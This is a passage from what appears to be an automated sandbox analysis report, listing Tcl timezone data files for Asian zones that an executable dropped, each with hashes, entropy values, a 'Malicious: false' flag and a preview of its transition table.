C:\Users\user\Desktop\tcl\tzdata\Asia\Baku Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7087
Entropy (8bit):	3.7112129677911785
Encrypted:	false
SSDEEP:	96:7CbMFbN5FMhBnLT9Eb82WFddWqgYL2WCQotwY2hssmC1j+IqgzbiSjMAL3Bd8:7nFXFKBdEb82WFddfgYMQUwYpCuW3Bq
MD5:	D5493186CFA8CBA38FEF6CB2B8D58F66
SHA1:	6FE30365F3BADC12337E62387D2DC5D1590E462B
SHA-256:	1442701FDDE072F3ED533586A641ECBB1EAF5930DF57C4D170910B2403678C09
SHA-512:	CED2D4C1B69EF46968E81AA7BFC8177425FB63AE2B8DBEDC71A3F3A428EB7DB08AC72F240CEEC951B1A00FCD64922B104CD7A564FA7A966AA3C3BAEC75E516B5
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Baku) {. {-9223372036854775808 11964 0 LMT}. {-1441163964 10800 0 BAKT}. {-405140400 14400 0 BAKT}. {354916800 18000 1 BAKST}. {370724400 14400 0 BAKT}. {386452800 18000 1 BAKST}. {402260400 14400 0 BAKT}. {417988800 18000 1 BAKST}. {433796400 14400 0 BAKT}. {449611200 18000 1 BAKST}. {465343200 14400 0 BAKT}. {481068000 18000 1 BAKST}. {496792800 14400 0 BAKT}. {512517600 18000 1 BAKST}. {528242400 14400 0 BAKT}. {543967200 18000 1 BAKST}. {559692000 14400 0 BAKT}. {575416800 18000 1 BAKST}. {591141600 14400 0 BAKT}. {606866400 18000 1 BAKST}. {622591200 14400 0 BAKT}. {638316000 18000 1 BAKST}. {654645600 14400 0 BAKT}. {670370400 14400 1 BAKST}. {683496000 14400 0 AZST}. {686098800 10800 0 AZT}. {701812800 14400 1 AZST}. {717537600 14400 0 AZT}. {820440000 14400 0 AZT}. {828234000 18000 1 AZST}. {846378000 14400 0 AZT}. {852062

C:\Users\user\Desktop\tcl\tzdata\Asia\Bangkok Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	174
Entropy (8bit):	4.870101193174299
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52WFKELYOUXGm2OHB+kevXZKmrROpDvFFsQ+8EXV8GCCn:SlSWB9X52wKELPm2OHxePZ3FO1Rb+2GL
MD5:	9547C9173AA853C298ECEEFD6CB66A7C
SHA1:	B9A17A14F652E3C22AE9552F93F0C7F8EE5E8444
SHA-256:	BE7B9D93A7EF23A2EF6CC90AB85001B66E4D37F314FFCEA0E36A4E1F625D1DDD
SHA-512:	FB984DC7DA388F68437545560AF0CE0952474C72811673DCBC4EC73BFEC4E7A985F459BDB3D5EF47A83B0731D203AF1F66D8DBD13CB8B3ED6A4041E7C2165E43
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Bangkok) {. {-9223372036854775808 24124 0 LMT}. {-2840164924 24124 0 BMT}. {-1570084924 25200 0 ICT}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Beirut Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7754
Entropy (8bit):	3.6329631010207892
Encrypted:	false
SSDEEP:	96:OnQv8iPC28v82K/w1VxDmsCZgV+f7dIWDkLDo1WlqCTpXxcKvjRQZwtPEWRTvS4y:OQjPCL5VxKWC7dIWDkLDoqphsX
MD5:	2D3AE4AD36BD5F302F980EB5F1DD0E4A
SHA1:	02244056D6D4EC57937D1E187CC65E8FD18F67F0
SHA-256:	E9DD371FA47F8EF1BE04109F0FD3EBD9FC5E2B0A12C0630CDD20099C838CBEBB
SHA-512:	2E4528254102210B8A9A2263A8A8E72774D40F57C2431C2DD6B1761CD91FB6CEA1FAD23877E1E2D86217609882F3605D7FE477B771A398F91F8D8AD3EAF90BAC
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Beirut) {. {-9223372036854775808 8520 0 LMT}. {-2840149320 7200 0 EET}. {-1570413600 10800 1 EEST}. {-1552186800 7200 0 EET}. {-1538359200 10800 1 EEST}. {-1522551600 7200 0 EET}. {-1507514400 10800 1 EEST}. {-1490583600 7200 0 EET}. {-1473645600 10800 1 EEST}. {-1460948400 7200 0 EET}. {-399866400 10800 1 EEST}. {-386650800 7200 0 EET}. {-368330400 10800 1 EEST}. {-355114800 7200 0 EET}. {-336794400 10800 1 EEST}. {-323578800 7200 0 EET}. {-305172000 10800 1 EEST}. {-291956400 7200 0 EET}. {-273636000 10800 1 EEST}. {-260420400 7200 0 EET}. {78012000 10800 1 EEST}. {86734800 7200 0 EET}. {105055200 10800 1 EEST}. {118270800 7200 0 EET}. {136591200 10800 1 EEST}. {149806800 7200 0 EET}. {168127200 10800 1 EEST}. {181342800 7200 0 EET}. {199749600 10800 1 EEST}. {212965200 7200 0 EET}. {231285600 10800 1 EEST}. {244501200 7200 0 EE

C:\Users\user\Desktop\tcl\tzdata\Asia\Bishkek Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1631
Entropy (8bit):	4.017458953208438
Encrypted:	false
SSDEEP:	24:cQge4ay42FChvqp7DzghGjwTwKcVVTHTiTiyU2oWUooOp:5wSqVXx7uRRp
MD5:	65B8BDCB642E932AD2D503C7241177A7
SHA1:	EA0D787E4A6DE96A7346EA91FA3612D4EFE74B41
SHA-256:	EC8F9DAEB039FA1E40FF2A80001B35DEFA0FEDBC5F0A9B451339FAC5250BC91F
SHA-512:	50152255EF633D90F5E11AC9F17C6CAD6F0E32FDF71ACFED6C18D3F4FD382EC0925E1A5717022B2722848598466CA20DC8A86F4FF639A631B839069729DB6DBA
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Bishkek) {. {-9223372036854775808 17904 0 LMT}. {-1441169904 18000 0 FRUT}. {-1247547600 21600 0 FRUT}. {354909600 25200 1 FRUST}. {370717200 21600 0 FRUT}. {386445600 25200 1 FRUST}. {402253200 21600 0 FRUT}. {417981600 25200 1 FRUST}. {433789200 21600 0 FRUT}. {449604000 25200 1 FRUST}. {465336000 21600 0 FRUT}. {481060800 25200 1 FRUST}. {496785600 21600 0 FRUT}. {512510400 25200 1 FRUST}. {528235200 21600 0 FRUT}. {543960000 25200 1 FRUST}. {559684800 21600 0 FRUT}. {575409600 25200 1 FRUST}. {591134400 21600 0 FRUT}. {606859200 25200 1 FRUST}. {622584000 21600 0 FRUT}. {638308800 25200 1 FRUST}. {654638400 21600 0 FRUT}. {670363200 21600 1 FRUST}. {683582400 21600 0 KGT}. {703018800 21600 1 KGST}. {717530400 18000 0 KGT}. {734468400 21600 1 KGST}. {748980000 18000 0 KGT}. {765918000 21600 1 KGST}. {780429600 18000 0 KGT}. {79

C:\Users\user\Desktop\tcl\tzdata\Asia\Brunei Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	173
Entropy (8bit):	4.8522836687190525
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52WFKXeAMMkEXGm2OHCQdvVVvUWUOVFW/FvnCHFiUMWfV1vVwK:SlSWB9X52wK0bm2OHCIvVVXUuW/oH1M4
MD5:	FE466A14AEBD47A272FEF267BBBE9D2F
SHA1:	1F774A7F7B7555BD2E8B7B3795046B8D6D42A6E6
SHA-256:	9339F71384B466EA9A5210D84EABBEC5EB61DEAA0689589804999B3EA34FD1B4
SHA-512:	C14A29D9EE5C4DBEDDE7B1E5ADD6B4080E274B9ED4550F987DCC6E6DC7EB3949A7441220CE5B50CCFA9EB0002427634E85D554ECCE8FDF695933DC3F51AE9CEE
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Brunei) {. {-9223372036854775808 27580 0 LMT}. {-1383464380 27000 0 BNT}. {-1167636600 28800 0 BNT}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Calcutta Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	173
Entropy (8bit):	4.721946029615065
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyq864DdVAIgN1EF2WFKh0s+WFKvvn:SlSWB9IZaM3ya4DdVAIgo2wKN+wKvv
MD5:	A967F010A398CD98871E1FF97F3E48AC
SHA1:	6C8C0AF614D6789CD1F9B6243D26FAC1F9B767EF
SHA-256:	B07250CD907CA11FE1C94F1DCCC999CECF8E9969F74442A9FCC00FC48EDE468B
SHA-512:	67E3207C8A63A5D8A1B7ED1A62D57639D695F9CD83126EB58A70EF076B816EC5C4FDBD23F1F32A4BB6F0F9131D30AF16B56CD92B1C42C240FD886C81BA8940DA
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Kolkata)]} {. LoadTimeZoneFile Asia/Kolkata.}.set TZData(:Asia/Calcutta) $TZData(:Asia/Kolkata).

C:\Users\user\Desktop\tcl\tzdata\Asia\Choibalsan Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	1486
Entropy (8bit):	4.021028316188265
Encrypted:	false
SSDEEP:	24:cQtZeCjDsGtyoXod+nqoNozomqod1oqoacvWjog2lzoBoAa8odzoIouPZomoFyoS:5tFAGp4g7yUm7dy7RvWkg2lUuA2GVuP5
MD5:	8F99BCC6813A4F47A14F3A23B0457274
SHA1:	1DB31FE9CE4AB6215853E22C00E7D51213939C87
SHA-256:	38BA1C9D0A9E7052D996D4642AE9A6945C51774D8EFA3E4D8870D2ABBDC48689
SHA-512:	AF762A7308E25C52C4F57274659D612CA1CA1EBC4AC79B55FE1F3BBCAE66AFEE8CE329A2F19BFC1DC7D4525FAEF3A17A53207ED2EB0C196450EF36CD5CB81080
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Choibalsan) {. {-9223372036854775808 27480 0 LMT}. {-2032933080 25200 0 ULAT}. {252435600 28800 0 ULAT}. {417974400 36000 0 CHOST}. {433778400 32400 0 CHOT}. {449593200 36000 1 CHOST}. {465314400 32400 0 CHOT}. {481042800 36000 1 CHOST}. {496764000 32400 0 CHOT}. {512492400 36000 1 CHOST}. {528213600 32400 0 CHOT}. {543942000 36000 1 CHOST}. {559663200 32400 0 CHOT}. {575391600 36000 1 CHOST}. {591112800 32400 0 CHOT}. {606841200 36000 1 CHOST}. {622562400 32400 0 CHOT}. {638290800 36000 1 CHOST}. {654616800 32400 0 CHOT}. {670345200 36000 1 CHOST}. {686066400 32400 0 CHOT}. {701794800 36000 1 CHOST}. {717516000 32400 0 CHOT}. {733244400 36000 1 CHOST}. {748965600 32400 0 CHOT}. {764694000 36000 1 CHOST}. {780415200 32400 0 CHOT}. {796143600 36000 1 CHOST}. {811864800 32400 0 CHOT}. {828198000 36000 1 CHOST}. {843919200 32400 0 CHOT}

C:\Users\user\Desktop\tcl\tzdata\Asia\Chongqing Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	511
Entropy (8bit):	4.2768932458579965
Encrypted:	false
SSDEEP:	12:MBp52DmdHPXARxwDNkq/HxJ2Qzq/hSaq/5Mq/xssjq/Xwq/4N:cQDefAfwkq/Hx4Qzq/hLq/Cq/xrq/Aqe
MD5:	3720CB2DE3247A910A526FBF3B681F37
SHA1:	75C7D2176B2758A819FFE098CD922C79FE27AF74
SHA-256:	66EB4F9AC18F9466458F22E2649D4FBB39110E548BDE4ED06377410BE2C5B250
SHA-512:	5690E09E57ABD94A4AF07D3444ADAD368BD62F9D8FF6C8795F1937F5F8FA5424BE087138E02B7DF26B55C2D34F4A9371132C2A9EFCF28D11E0D7A7E37AFD3283
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Chongqing) {. {-9223372036854775808 25580 0 LMT}. {-1325487980 25200 0 LONT}. {325962000 28800 0 CST}. {515520000 32400 1 CDT}. {527007600 28800 0 CST}. {545155200 32400 1 CDT}. {558457200 28800 0 CST}. {576604800 32400 1 CDT}. {589906800 28800 0 CST}. {608659200 32400 1 CDT}. {621961200 28800 0 CST}. {640108800 32400 1 CDT}. {653410800 28800 0 CST}. {671558400 32400 1 CDT}. {684860400 28800 0 CST}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Chungking Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	180
Entropy (8bit):	4.875625624602558
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyq8S2V4zFVAIgN9Y2/O0L2WFK7LeL9J4WFKh2Vvn:SlSWB9IZaM3yyHzFVAIgUf0L2wK7LUT/
MD5:	FF516E9E575D4C095ED0F9D3E913CB89
SHA1:	BBC40261D702B78513DAA24330EE0158F261922E
SHA-256:	688985C9C836D2011236653F40AAF19E8DED977321BB792E337E6F41E1D87C5A
SHA-512:	93029C2A74B715A14BD3887C4D9E7B2E2D54C5B4EEDAA048F8A0986B69AB27E54F1BE19E6306784F65D9B9DBCB5FE3D2E96B1090E82F6ED5997AF9D3CD686735
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Chongqing)]} {. LoadTimeZoneFile Asia/Chongqing.}.set TZData(:Asia/Chungking) $TZData(:Asia/Chongqing).

C:\Users\user\Desktop\tcl\tzdata\Asia\Colombo Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	347
Entropy (8bit):	4.548956625397722
Encrypted:	false
SSDEEP:	6:SlSWB9X52wKr+tJm2OHgPZv9tGZjSWV/FJGTpPUrKBYFD/k5mYdoRVVFJGrR/aYt:MBp52z+mdHgPZvqZj1NJGVPh4/YmYdKQ
MD5:	35533BF2EBC8405BB6E8FEE7D0A36448
SHA1:	BF3278C0ED462F4F75FEC20C9ACBDF144C0D5D6A
SHA-256:	D14D6566F2034769D62EB1341E0816EEF2BC64ACDF62E20F3AA5CA26D66D8E3F
SHA-512:	D6351048DDD441E46F4E7BB3C7559DC0BDC25D93C0C3F76BA99932575D0D7C39C44F032670A89FCA2F1120D4278F702ACE8142E086FAB77C66784DC31CB077F4
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Colombo) {. {-9223372036854775808 19164 0 LMT}. {-2840159964 19172 0 MMT}. {-2019705572 19800 0 IST}. {-883287000 21600 1 IHST}. {-862639200 23400 1 IST}. {-764051400 19800 0 IST}. {832962600 23400 0 LKT}. {846266400 21600 0 LKT}. {1145039400 19800 0 IST}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Dacca Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	164
Entropy (8bit):	4.733855608307331
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyq8ntdVAIgN6Ko2WFK1S2WFKwu:SlSWB9IZaM3yHtdVAIgMKo2wKM2wKwu
MD5:	629FC03B52D24615FB052C84B0F30452
SHA1:	80D24B1A70FC568AB9C555BD1CC70C17571F6061
SHA-256:	BD3E4EE002AFF8F84E74A6D53E08AF5B5F2CAF2B06C9E70B64B05FC8F0B6CA99
SHA-512:	1C912A5F323E84A82D60300F6AC55892F870974D4DEFE0AF0B8F6A87867A176D3F8D66C1A5B11D8560F549D738FFE377DC20EB055182615062D4649BBA011F32
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Dhaka)]} {. LoadTimeZoneFile Asia/Dhaka.}.set TZData(:Asia/Dacca) $TZData(:Asia/Dhaka).

C:\Users\user\Desktop\tcl\tzdata\Asia\Damascus Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8031
Entropy (8bit):	3.629699951300869
Encrypted:	false
SSDEEP:	96:zY75F5VoNVIkbl3IUQZufk0Eej4YWuM0c5/61a7/VGfV8SbU5J3Mirmgs3LmiK:zI75KN+YlgYE+4YWPB6O4in9
MD5:	202E5950F6324878B0E6FD0056D2F186
SHA1:	A668D4DC3E73A292728CCE136EFFAC95D5952A81
SHA-256:	3BB43B71FF807AA3BF6A7F94680FB8BD586A1471218307A6A7A4CE73A5A3A55E
SHA-512:	5F9A7308E9C08267ECB8D502505EF9B32269D62FA490D6BC01F6927CB8D5B40CA17BB0CDFA3EE78D48C7686EAA7FD266666EB80E54125859F86CADFD7366DB6B
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Damascus) {. {-9223372036854775808 8712 0 LMT}. {-1577931912 7200 0 EET}. {-1568592000 10800 1 EEST}. {-1554080400 7200 0 EET}. {-1537142400 10800 1 EEST}. {-1522630800 7200 0 EET}. {-1505692800 10800 1 EEST}. {-1491181200 7200 0 EET}. {-1474243200 10800 1 EEST}. {-1459126800 7200 0 EET}. {-242265600 10800 1 EEST}. {-228877200 7200 0 EET}. {-210556800 10800 1 EEST}. {-197427600 7200 0 EET}. {-178934400 10800 1 EEST}. {-165718800 7200 0 EET}. {-147398400 10800 1 EEST}. {-134269200 7200 0 EET}. {-116467200 10800 1 EEST}. {-102646800 7200 0 EET}. {-84326400 10800 1 EEST}. {-71110800 7200 0 EET}. {-52704000 10800 1 EEST}. {-39488400 7200 0 EET}. {-21168000 10800 1 EEST}. {-7952400 7200 0 EET}. {10368000 10800 1 EEST}. {23583600 7200 0 EET}. {41904000 10800 1 EEST}. {55119600 7200 0 EET}. {73526400 10800 1 EEST}. {86742000 7200 0 EET}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Dhaka Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	376
Entropy (8bit):	4.487755005841458
Encrypted:	false
SSDEEP:	6:SlSWB9X52wKwfTm2OHEmVFnP9vX+H7MsckVVFJGTL/FG/MEy/ENBErSv/bi/Sv/A:MBp52YfTmdHzdP9P+bXvJGnQt5NBE27C
MD5:	A9B8209EC9E35937C2D41D8D89BE11AC
SHA1:	2612529F907E052EB788E130EE18DCD2FFC6D40E
SHA-256:	5925E4381C7B1317F1FF50CE08BCF7AF2DD2F1FF0F55ECAA73DB36B07BD2CAA9
SHA-512:	09698D8D8CDF3F1FB6D8A83EEBD784C8B411D51F6DBB8779BE701AF743FC5FFB57147FC91B6717E652E37C7DEF5BE94BC3D320759E151BF602519F6C6852A6D9
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Dhaka) {. {-9223372036854775808 21700 0 LMT}. {-2524543300 21200 0 HMT}. {-891582800 23400 0 BURT}. {-872058600 19800 0 IST}. {-862637400 23400 0 BURT}. {-576138600 21600 0 DACT}. {38772000 21600 0 BDT}. {1230746400 21600 0 BDT}. {1245430800 25200 1 BDST}. {1262278740 21600 0 BDT}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Dili Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	255
Entropy (8bit):	4.568808132392647
Encrypted:	false
SSDEEP:	6:SlSWB9X52wKCXeLm2OHnBGeV8/lvyvmnvQ/9KR1avQC:MBp52qXEmdHnBvVYyaL8F
MD5:	102F243B194E0621A74C803928BD2538
SHA1:	8FF3B011F944A078A74EB0F0E20CF93CE8CBBD59
SHA-256:	E0EC22758027F2FCEF23D86ABFCFAB5DF6ED551388AACDD9F5A553A75253E7C7
SHA-512:	39C5C7CD3BDA02D14DDEDC4CD47A9E0F2D73BA67EF42E058B61E2A36E47A4777C65E5FE7EF88F786FFD24B79515BCF7F0BCAE3B6ABA96E5B48E125DE4910BE17
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Dili) {. {-9223372036854775808 30140 0 LMT}. {-1830414140 28800 0 TLT}. {-879152400 32400 0 JST}. {-766054800 32400 0 TLT}. {199897200 28800 0 CIT}. {969120000 32400 0 TLT}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Dubai Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	142
Entropy (8bit):	4.963122715057284
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFx52WFKQiXGm2OHvkdvUQK23NVVL:SlSWB9X52wKQZm2OHvsRVNzL
MD5:	2B181DB4C9B360B5B7373DB8A70F47AA
SHA1:	E0A840BF9C5D4C13A29040E5DD7C03D566C8A73E
SHA-256:	061F12109C47BC58000693ACDFA1358CBD88A9D9F6784913C177B623320D793D
SHA-512:	2DC3F62E87A2A52249EABB3164DCE3F295426A0DE514DAAA05309F1676478CAC0A6B2CC14F8578E20E3806AB61A867968050588D8A0C5AAE6900B4203E82D4BA
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Dubai) {. {-9223372036854775808 13272 0 LMT}. {-1577936472 14400 0 GST}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Dushanbe Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	825
Entropy (8bit):	4.144027251159681
Encrypted:	false
SSDEEP:	24:cQJeOhnLzFC5+qsnDMg4NjJMtW90cTyTi8GL:5J7qR9xWu/
MD5:	C7218D3EE62FB80760364BB9B702E60D
SHA1:	22E4F10B09074BE08FFA6E1531D06131B2B7BEDB
SHA-256:	7E98FA8D65FC458F1C60916A8ED629D0672901153AFA88CB31D7722906411F9C
SHA-512:	E1B62FAE2B801D82DAEE06339EA02774B9B17518D1C5197C145C101687D7E6058EDDC69BF7750DBBA49B9208FAB74FA5017826ACBEFE133F9D7A3C1245067038
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Dushanbe) {. {-9223372036854775808 16512 0 LMT}. {-1441168512 18000 0 DUST}. {-1247547600 21600 0 DUST}. {354909600 25200 1 DUSST}. {370717200 21600 0 DUST}. {386445600 25200 1 DUSST}. {402253200 21600 0 DUST}. {417981600 25200 1 DUSST}. {433789200 21600 0 DUST}. {449604000 25200 1 DUSST}. {465336000 21600 0 DUST}. {481060800 25200 1 DUSST}. {496785600 21600 0 DUST}. {512510400 25200 1 DUSST}. {528235200 21600 0 DUST}. {543960000 25200 1 DUSST}. {559684800 21600 0 DUST}. {575409600 25200 1 DUSST}. {591134400 21600 0 DUST}. {606859200 25200 1 DUSST}. {622584000 21600 0 DUST}. {638308800 25200 1 DUSST}. {654638400 21600 0 DUST}. {670363200 21600 1 DUSST}. {684363600 18000 0 TJT}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Gaza Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7963
Entropy (8bit):	3.6574990165665264
Encrypted:	false
SSDEEP:	96:uRGaKoVy0FUeLR2S5nfclzs8x6PxGtv2h4WF1mkWdSejNgMuMDxqE4egHwV6XPQP:uR7Vy0Wet9MPdS+NgMPf4IbS0
MD5:	B86DB8EA7D969D9EC0ED8069849A5C4D
SHA1:	A29DCC78729C0708819113C972D8F9D7376F7DF2
SHA-256:	10F6C569E443583E19A8BB0668F5629F8894FB542615F03C24DFB13EB0C1C74A
SHA-512:	C4B74E82573EB6B5BF119E14D5793F091701576C0E51BD7DAD8B9AD5181C7AB3F51330BC54DA04DD695BAAAAFCE181557F0E956FFECF720B761E94D986383A9F
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Gaza) {. {-9223372036854775808 8272 0 LMT}. {-2185409872 7200 0 EET}. {-933645600 10800 1 EET}. {-857358000 7200 0 EET}. {-844300800 10800 1 EET}. {-825822000 7200 0 EET}. {-812685600 10800 1 EET}. {-794199600 7200 0 EET}. {-779853600 10800 1 EET}. {-762656400 7200 0 EET}. {-748310400 10800 1 EET}. {-731127600 7200 0 EET}. {-682653600 7200 0 EET}. {-399088800 10800 1 EEST}. {-386650800 7200 0 EET}. {-368330400 10800 1 EEST}. {-355114800 7200 0 EET}. {-336790800 10800 1 EEST}. {-323654400 7200 0 EET}. {-305168400 10800 1 EEST}. {-292032000 7200 0 EET}. {-273632400 10800 1 EEST}. {-260496000 7200 0 EET}. {-242096400 10800 1 EEST}. {-228960000 7200 0 EET}. {-210560400 10800 1 EEST}. {-197424000 7200 0 EET}. {-178938000 10800 1 EEST}. {-165801600 7200 0 EET}. {-147402000 10800 1 EEST}. {-134265600 7200 0 EET}. {-115866000 10800 1 EEST

C:\Users\user\Desktop\tcl\tzdata\Asia\Harbin Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	598
Entropy (8bit):	4.198818418010046
Encrypted:	false
SSDEEP:	12:MBp52TTmdHaXAbpCVctPRLNkq/HxJ2Qzq/hSaq/5Mq/xssjq/Xwq/4N:cQXeIA/hRRkq/Hx4Qzq/hLq/Cq/xrq/C
MD5:	BC6F9801C74820AF97FE8CE940D8DB82
SHA1:	6D746A1DB41B44B4153453752129566BC43B82A6
SHA-256:	14D630B041B239BEC954EF3173B2F5A22FA0D436A3A935A0556BC29B4942580F
SHA-512:	3FB328643C6A8A641220BE2618F96D9E772BC6E93982226DBFD4F4A879B8FC4FB8E33B7F65DDB65B9A659C3E26E15BE4089EC8F84D7D404DD214FBAE956D7FDF
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Harbin) {. {-9223372036854775808 30404 0 LMT}. {-1325492804 30600 0 CHAT}. {-1194078600 28800 0 CST}. {-946800000 32400 0 CHAT}. {-115894800 30600 0 CHAT}. {325956600 28800 0 CST}. {515520000 32400 1 CDT}. {527007600 28800 0 CST}. {545155200 32400 1 CDT}. {558457200 28800 0 CST}. {576604800 32400 1 CDT}. {589906800 28800 0 CST}. {608659200 32400 1 CDT}. {621961200 28800 0 CST}. {640108800 32400 1 CDT}. {653410800 28800 0 CST}. {671558400 32400 1 CDT}. {684860400 28800 0 CST}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Hebron Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7939
Entropy (8bit):	3.6601658382999283
Encrypted:	false
SSDEEP:	96:J2aKoVy0FUeLR2S5nfclzs8x6PxGtv2h4WS1mkWdSejNgMuMDxqE4egHwV6XPQS2:JLVy0Wet9MidS+NgMPf4IbS0
MD5:	C8479B8D5B5A0CD168C05CCD9B4E0898
SHA1:	F1FA6604ECE2C8B47167A2FEC2765EA4EEC18B57
SHA-256:	FE020AA6577A7F15E55932AE800312AAFF47CD4E7A4EDAF9B01B380D5F198FC2
SHA-512:	CAC8FB3355D7A1047047EF9EA552000A67B79111E11A61F1E4BD9026AA93BD73B6BF1FF7E0E983D551F9B002EFB47436EFBA0C960445CFA380225948A5C92551
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Hebron) {. {-9223372036854775808 8423 0 LMT}. {-2185410023 7200 0 EET}. {-933645600 10800 1 EET}. {-857358000 7200 0 EET}. {-844300800 10800 1 EET}. {-825822000 7200 0 EET}. {-812685600 10800 1 EET}. {-794199600 7200 0 EET}. {-779853600 10800 1 EET}. {-762656400 7200 0 EET}. {-748310400 10800 1 EET}. {-731127600 7200 0 EET}. {-682653600 7200 0 EET}. {-399088800 10800 1 EEST}. {-386650800 7200 0 EET}. {-368330400 10800 1 EEST}. {-355114800 7200 0 EET}. {-336790800 10800 1 EEST}. {-323654400 7200 0 EET}. {-305168400 10800 1 EEST}. {-292032000 7200 0 EET}. {-273632400 10800 1 EEST}. {-260496000 7200 0 EET}. {-242096400 10800 1 EEST}. {-228960000 7200 0 EET}. {-210560400 10800 1 EEST}. {-197424000 7200 0 EET}. {-178938000 10800 1 EEST}. {-165801600 7200 0 EET}. {-147402000 10800 1 EEST}. {-134265600 7200 0 EET}. {-115866000 10800 1 EE

C:\Users\user\Desktop\tcl\tzdata\Asia\Ho_Chi_Minh Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	238
Entropy (8bit):	4.706647008651454
Encrypted:	false
SSDEEP:	6:SlSWB9X52wKKACm2OHAT1PAACuGLQuGLn:MBp52SmdHqPAASLML
MD5:	75E3F7FB697A6736A5426627246C954F
SHA1:	B5FDFAFEFC989836C2A42AFABF6C016B5E5E0935
SHA-256:	DD009FC431F3A8C290212CFF4E83967FC4ADA0613F3DD3761671C8A7B2FB021F
SHA-512:	EFB49C067891F1F67B92DF742506B46AF7B4E821100113E956161EDE6E2FEFB14B3FEA65FA94A01194BC4858249737C298AD385050D555B7F23EED5AE9A71986
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Asia/Ho_Chi_Minh) {. {-9223372036854775808 25600 0 LMT}. {-2005974400 25580 0 SMT}. {-1855983920 25200 0 ICT}. {-1819954800 28800 0 ICT}. {-1220428800 25200 0 ICT}.}.

C:\Users\user\Desktop\tcl\tzdata\Asia\Hong_Kong Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2150
Entropy (8bit):	3.923186571913929
Encrypted:	false
